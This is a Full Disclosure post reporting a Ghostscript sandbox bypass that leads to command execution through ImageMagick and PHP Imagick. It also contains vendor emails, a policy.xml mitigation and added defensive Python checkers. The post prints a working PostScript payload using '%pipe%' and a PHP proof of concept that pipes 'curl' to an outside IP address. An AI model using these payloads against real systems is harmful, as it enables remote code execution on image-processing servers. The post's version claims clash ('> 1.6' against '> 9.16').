
[FD] Ghostscript sandbox bypass leads ImageMagick to remote code execution



Recently I noticed Tavis Ormandy reporting a vulnerability in Ghostscript: the
-dSAFER mode could be bypassed, leading to code execution. However, no one had
exploited it in an application. Here is a short discussion and exploit for it.



Author: redrain, yu.hong AT chaitin.com
Date: 2016-10-17
Version: Ghostscript version > 1.6
         ImageMagick (or other apps): all versions
Vendor Notified: 2016-10-18

ImageMagick allows files to be processed by external programs (delegates).
Some of those delegates are:

<delegate decode="eps" encode="pdf" mode="bi" command="&quot;gs&quot; -q
-dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000
&quot;-sDEVICE=pdfwrite&quot; &quot;-sOutputFile=%o&quot;
&quot;-f%i&quot;"/>
<delegate decode="eps" encode="ps" mode="bi" command="&quot;gs&quot; -q
-dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000
-dAlignToPixels=0 -dGridFitTT=2 &quot;-sDEVICE=ps2write&quot;
&quot;-sOutputFile=%o&quot; &quot;-f%i&quot;"/>
<delegate decode="ps" encode="eps" mode="bi" command="&quot;gs&quot; -q
-dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000
-dAlignToPixels=0 -dGridFitTT=2 &quot;-sDEVICE=epswrite&quot;
&quot;-sOutputFile=%o&quot; &quot;-f%i&quot;"/>
<delegate decode="ps" encode="pdf" mode="bi" command="&quot;gs&quot; -q
-dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000
-dAlignToPixels=0 -dGridFitTT=2 &quot;-sDEVICE=pdfwrite&quot;
&quot;-sOutputFile=%o&quot; &quot;-f%i&quot;"/>

All of these delegates use Ghostscript (gs) to handle the "pdf to eps",
"ps to eps", "eps to ps" and "pdf to ps" conversions, and all of them hand the
input file to gs with the -f parameter; a crafted input file can then lead
Ghostscript to execute arbitrary commands.

Ghostscript version: > 9.16
For example, the latest Ubuntu 16.10 ghostscript package is version 9.19, so
any user of ImageMagick on that system is vulnerable.

cat rr.pdf
%!PS
currentdevice null true mark /OutputICCProfile (%pipe%id > /dev/tty)
.putdeviceparams
quit

convert rr.pdf eps:rr
root@redrain-Parallels-Virtual-Platform:/tmp# convert rr.pdf eps:rr
uid=0(root) gid=0(root) 组=0(root)
+ ./base/gsicc_manage.c:1680: gsicc_set_device_profile(): Creation of ICC
profile failed
uid=0(root) gid=0(root) 组=0(root)
+ ./base/gsicc_manage.c:1680: gsicc_set_device_profile(): Creation of ICC
profile failed
convert: no images defined `eps:rr' @
error/convert.c/ConvertImageCommand/3253.

An interesting detail: ImageMagick recognizes a file's real format from its
header rather than its extension, and uses the corresponding delegate to handle
it, so the PostScript payload above is processed even though it is named rr.pdf.

It also affects Imagick (the PHP extension).

PoC:
<?php
$command = PHP_SAPI == 'cli' ? $argv[1] : $_GET['cmd'];
if ($command == '') {
    $command = 'id';
}

$exploit = <<<EOF
%!PS

currentdevice null true mark /OutputICCProfile (%pipe%curl
108.61.160.217:12344)

.putdeviceparams

quit
EOF;

$thumb = new Imagick();
$thumb->readImageBlob($exploit);

Regards,
redrain
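As an added example (not part of the advisory or its attached a.tar.gz), a defender-side pre-check in Python that does what the advisory says ImageMagick does, sniffing the real format from the file header instead of trusting the extension, and flags the %pipe% / OutputICCProfile / .putdeviceparams pattern before a file is handed to a Ghostscript delegate. The magic table, extension map and sample files are constructed for the example and are not ImageMagick's own.

```python
import re

# Constructed sample inputs (not the advisory's attachment): a PostScript
# payload of the same shape as rr.pdf, plus a genuine PDF and a JPEG header.
SAMPLE_FILES = {
    "rr.pdf": (b"%!PS\ncurrentdevice null true mark /OutputICCProfile "
               b"(%pipe%id > /dev/tty)\n.putdeviceparams\nquit\n"),
    "real.pdf": b"%PDF-1.4\n1 0 obj\n<< /Type /Catalog >>\nendobj\n",
    "photo.jpg": b"\xff\xd8\xff\xe0\x00\x10JFIF\x00",
}
# Header magic, checked the way ImageMagick picks a coder: by content, not
# extension. The table is an assumption for the example, not ImageMagick's.
MAGIC = [(b"%!PS", "PS"), (b"%PDF-", "PDF"),
         (b"\xff\xd8\xff", "JPEG"), (b"\x89PNG\r\n\x1a\n", "PNG")]
EXT_FORMAT = {"ps": "PS", "eps": "PS", "pdf": "PDF",
              "jpg": "JPEG", "jpeg": "JPEG", "png": "PNG"}
# The pieces of the -dSAFER bypass shown in the advisory.
INDICATORS = [(re.compile(rb"%pipe%"), "%pipe% device"),
              (re.compile(rb"/OutputICCProfile"), "OutputICCProfile parameter"),
              (re.compile(rb"\.putdeviceparams"), ".putdeviceparams operator")]

def sniff_format(data: bytes) -> str:
    """Return the format implied by the header, or UNKNOWN."""
    for magic, name in MAGIC:
        if data.startswith(magic):
            return name
    return "UNKNOWN"

def inspect_upload(name: str, data: bytes) -> dict:
    """Report whether a file would reach a gs delegate and whether to reject it."""
    fmt = sniff_format(data)
    ext = name.rsplit(".", 1)[-1].lower() if "." in name else ""
    hits = [label for rx, label in INDICATORS if rx.search(data)]
    reaches_gs = fmt in ("PS", "PDF")          # only these delegates run gs
    mismatch = EXT_FORMAT.get(ext) != fmt      # e.g. %!PS content named .pdf
    return {"sniffed": fmt, "reaches_ghostscript": reaches_gs,
            "extension_mismatch": mismatch, "indicators": hits,
            "reject": reaches_gs and (bool(hits) or mismatch)}

def scan_all(files=SAMPLE_FILES) -> dict:
    return {name: inspect_upload(name, data) for name, data in files.items()}

if __name__ == "__main__":
    for name, result in scan_all().items():
        print(name, result)
```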



---------- Forwarded message ----------
From: redrain root <rootredrain AT gmail.com>
Date: 2016-10-19 1:47 GMT+08:00
Subject: Fwd: Security Issue
To: chris.liddell AT artifex.com


Hi chris,
there is a vulnerability about Ghostscript, imagemagick security team
suggest me to post to your group

Regards,
redrain



Forwarded conversation
Subject: Re: Security Issue
------------------------

From: <vir.prudens.non.contra.ventum.mingit AT imagemagick.org>
Date: 2016-10-18 19:16 GMT+08:00
To: rootredrain AT gmail.com


We've seen this Ghostscript issue before and it was rerouted to the Ghostscript
maintainers.  And it looks like the flaw in Ghostscript might be fixed.
We're using Ghostscript 9.20 and we get:

'gs' -q -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000
-dAlignToPixels=0 -dGridFitTT=2 '-sDEVICE=pngalpha' -dTextAlphaBits=4
-dGraphicsAlphaBits=4 '-r72x72' -g612x792
'-sOutputFile=/tmp/magick-648756ZKNqV4YYgXz%d'
'-f/tmp/magick-64875THTBoMVujWnI' '-f/tmp/magick-64875_eM-vPaztTOQ'
  ./base/gsicc_manage.c:1148: gsicc_open_search(): Could not find %pipe%id
> /dev/tty
| ./base/gsicc_manage.c:1789: gsicc_set_device_profile(): cannot find
device profile
'gs' -q -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000
-dAlignToPixels=0 -dGridFitTT=2 '-sDEVICE=pngalpha' -dTextAlphaBits=4
-dGraphicsAlphaBits=4 '-r72x72' -g612x792
'-sOutputFile=/tmp/magick-648756ZKNqV4YYgXz%d'
'-f/tmp/magick-64875THTBoMVujWnI' '-f/tmp/magick-64875_eM-vPaztTOQ' -c
showpage
  ./base/gsicc_manage.c:1148: gsicc_open_search(): Could not find %pipe%id
> /dev/tty
| ./base/gsicc_manage.c:1789: gsicc_set_device_profile(): cannot find
device profile
convert: no images defined `eps:rr' @ error/convert.c/ConvertImageCommand/3253.


Until Ghostscript is upgraded under Ubuntu with the Ghostscript security
patch,
you can add a security policy to ImageMagick's policy.xml to prevent
Postscript / PDF from being rendered:

  <policy domain="coder" rights="none" pattern="PS" />
  <policy domain="coder" rights="none" pattern="EPS" />
  <policy domain="coder" rights="none" pattern="PDF" />

Now we get

convert -verbose rr.pdf eps:rr
convert: not authorized `rr.pdf' @ error/constitute.c/ReadImage/416.
convert: no images defined `eps:rr' @ error/convert.c/ConvertImageCommand/3253.

The ImageMagick Security Team
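As an added example (not part of the ImageMagick team's reply), a small Python audit of an ImageMagick policy.xml that checks whether the three coder policies suggested above are in place, run over a constructed weak policy and the hardened one. The brace-list pattern expansion is an assumption about ImageMagick's glob matching, not something the reply states.

```python
import xml.etree.ElementTree as ET

# Constructed policy.xml samples (no DOCTYPE, not a real system's file): one
# leaving the Ghostscript-backed coders enabled, one with the three policies.
WEAK_POLICY = """<policymap>
  <policy domain="resource" name="memory" value="256MiB"/>
  <policy domain="coder" rights="none" pattern="EPHEMERAL"/>
</policymap>"""
HARDENED_POLICY = """<policymap>
  <policy domain="resource" name="memory" value="256MiB"/>
  <policy domain="coder" rights="none" pattern="PS" />
  <policy domain="coder" rights="none" pattern="EPS" />
  <policy domain="coder" rights="none" pattern="PDF" />
</policymap>"""
GS_CODERS = ("PS", "EPS", "PDF")   # coders whose delegates invoke gs

def expand_pattern(pattern: str) -> list:
    """Expand a {A,B,C} list (assumed ImageMagick glob form); else as-is."""
    p = pattern.strip().upper()
    if p.startswith("{") and p.endswith("}"):
        return [x.strip() for x in p[1:-1].split(",")]
    return [p]

def denied_coders(policy_xml: str) -> set:
    """Coder patterns for which the policy grants no rights at all."""
    denied = set()
    for policy in ET.fromstring(policy_xml).iter("policy"):
        if policy.get("domain") != "coder":
            continue
        if policy.get("rights", "").strip().lower() == "none":
            denied.update(expand_pattern(policy.get("pattern", "")))
    return denied

def unblocked_gs_coders(policy_xml: str) -> list:
    """Ghostscript-backed coders the policy still lets ImageMagick use."""
    denied = denied_coders(policy_xml)
    if "*" in denied:          # a wildcard pattern denies every coder
        return []
    return [c for c in GS_CODERS if c not in denied]

def audit(policy_xml: str) -> dict:
    missing = unblocked_gs_coders(policy_xml)
    return {"safe": not missing, "missing_patterns": missing}

if __name__ == "__main__":
    print("weak:", audit(WEAK_POLICY))          # safe: False, missing all three
    print("hardened:", audit(HARDENED_POLICY))  # safe: True
```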

----------
From: redrain root <rootredrain AT gmail.com>
Date: 2016-10-18 19:41 GMT+08:00
To: vir.prudens.non.contra.ventum.mingit AT imagemagick.org


[image: inline image 1]

root@ubuntu:/opt/ghostscript-9.20-linux-x86_64# ./gs-920-linux_x86_64  -q
-dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000
 -sDEVICE=pdfwrite   -sOutputFile=1.eps   -f /var/www/html/1.pdf
uid=0(root) gid=0(root) groups=0(root)
+ ./base/gsicc_manage.c:1713: gsicc_set_device_profile(): Creation of ICC
profile failed
root@ubuntu:/opt/ghostscript-9.20-linux-x86_64# ./gs-920-linux_x86_64
--version
9.20
root@ubuntu:/opt/ghostscript-9.20-linux-x86_64#


Regards,
redrain



----------
From: redrain root <rootredrain AT gmail.com>
Date: 2016-10-18 19:45 GMT+08:00
To: vir.prudens.non.contra.ventum.mingit AT imagemagick.org


I guess you used the old gs version?
and this vulnerability affects versions >9.16

Regards,
redrain



2016-10-18 19:16 GMT+08:00 <vir.prudens.non.contra.ventum.mingit AT imagemagick.org>:


----------
From: <vir.prudens.non.contra.ventum.mingit AT imagemagick.org>
Date: 2016-10-18 19:50 GMT+08:00
To: vir.prudens.non.contra.ventum.mingit AT imagemagick.org,
rootredrain AT gmail.com


redrain root <rootredrain AT gmail.com> wrote:

> I guess you used the old gs version?
> and this vulnerability affects versions >9.16

We're using Ghostscript 9.20 which is > 9.16.

----------
From: redrain root <rootredrain AT gmail.com>
Date: 2016-10-18 20:11 GMT+08:00
To: vir.prudens.non.contra.ventum.mingit AT imagemagick.org


You can use

tar zxf a.tar.gz
cd sb
./a.sh

then the command returns "uid=0(root) gid=0(root) groups=0(root)"

Regards,
redrain



----------
From: <vir.prudens.non.contra.ventum.mingit AT imagemagick.org>
Date: 2016-10-18 21:08 GMT+08:00
To: vir.prudens.non.contra.ventum.mingit AT imagemagick.org,
rootredrain AT gmail.com


redrain root <rootredrain AT gmail.com> wrote:

> [image: inline image 1]
>
> root@ubuntu:/opt/ghostscript-9.20-linux-x86_64# ./gs-920-linux_x86_64  -q
> -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000
>  -sDEVICE=pdfwrite   -sOutputFile=1.eps   -f /var/www/html/1.pdf
> uid=0(root) gid=0(root) groups=0(root)
> + ./base/gsicc_manage.c:1713: gsicc_set_device_profile(): Creation of ICC
> profile failed
> root@ubuntu:/opt/ghostscript-9.20-linux-x86_64# ./gs-920-linux_x86_64
> --version
> 9.20
> root@ubuntu:/opt/ghostscript-9.20-linux-x86_64#
>

It's likely the patch was against Ghostscript in Fedora 25.  As mentioned,
in the meantime add a security policy to ImageMagick to prevent the use
of Ghostscript.

----------
From: redrain root <rootredrain AT gmail.com>
Date: 2016-10-18 21:19 GMT+08:00
To: vir.prudens.non.contra.ventum.mingit AT imagemagick.org


The latest Ghostscript is downloaded from http://www.ghostscript.com/
download/gsdnld.html and I'm trying to reproduce this vuln in different
distros; it works.

So do you consider this a valid vulnerability?
And another interesting thing is I tried to exploit it in imagick; it looks to
work well.

PoC:
<?php
$command = PHP_SAPI == 'cli' ? $argv[1] : $_GET['cmd'];
if ($command == '') {
    $command = 'id';
}

$exploit = <<<EOF
%!PS

currentdevice null true mark /OutputICCProfile (%pipe%curl
108.61.160.217:12344)

.putdeviceparams

quit
EOF;

$thumb = new Imagick();
$thumb->readImageBlob($exploit);

Regards,
redrain



----------
From: redrain root <rootredrain AT gmail.com>
Date: 2016-10-18 21:38 GMT+08:00
To: 332746458 AT qq.com



Regards,
redrain



----------
From: <vir.prudens.non.contra.ventum.mingit AT imagemagick.org>
Date: 2016-10-18 22:21 GMT+08:00
To: vir.prudens.non.contra.ventum.mingit AT imagemagick.org,
rootredrain AT gmail.com


redrain root <rootredrain AT gmail.com> wrote:

> the latest Ghostscript is downloaded from
> http://www.ghostscript.com/download/gsdnld.html and I'm trying to
> reproduce

This appears to be a Ghostscript vulnerability.  Post to the Ghostscript
developers group.  We can't fix a Ghostscript vulnerability and our only
suggestion is an ImageMagick security policy that prevents the use of
Ghostscript until the vulnerability is fixed in Ghostscript.

PNG image

Attachment: a.tar.gz
Description: GNU Zip compressed data

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/